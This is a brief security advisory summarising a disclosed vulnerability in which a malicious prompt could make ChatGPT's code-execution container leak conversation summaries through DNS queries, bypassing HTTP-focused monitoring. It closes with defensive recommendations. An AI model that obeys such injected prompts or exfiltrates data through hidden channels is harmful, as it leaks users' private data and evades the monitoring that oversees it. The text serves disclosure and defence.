OpenAI — ChatGPT DNS side channel data exfiltration vulnerability
AI relevance: ChatGPT's code execution capability represents a critical AI tooling surface where prompt injection can bypass security controls, demonstrating the need for robust runtime isolation and monitoring in AI agent systems.
- Check Point Research discovered a hidden DNS side channel in ChatGPT's code execution runtime environment
- The vulnerability allowed silent data exfiltration without user knowledge or consent
- Attackers could craft malicious prompts that triggered DNS queries containing conversation summaries
- The exfiltration occurred through the container used by ChatGPT for code execution and data analysis
- Researchers demonstrated that a single malicious prompt could activate the hidden channel
- The vulnerability was patched by OpenAI on March 30, 2026 after responsible disclosure
- This represents a novel class of AI supply chain attacks targeting runtime environments
- The attack bypassed traditional security monitoring focused on HTTP traffic
Why it matters
This vulnerability demonstrates how AI tooling runtime environments can introduce hidden attack surfaces that traditional security monitoring misses. DNS-based exfiltration channels are particularly dangerous because they often bypass network security controls and logging, making them ideal for stealthy data theft from AI systems processing sensitive information.
What to do
- Monitor DNS queries from AI runtime environments for anomalous patterns and data exfiltration
- Implement runtime isolation for AI code execution with strict network egress controls
- Audit AI tooling supply chains for hidden channels and side effects
- Use DNS filtering and logging to detect data exfiltration attempts
- Apply the principle of least privilege to AI runtime environments
- Conduct regular security assessments of AI tooling infrastructure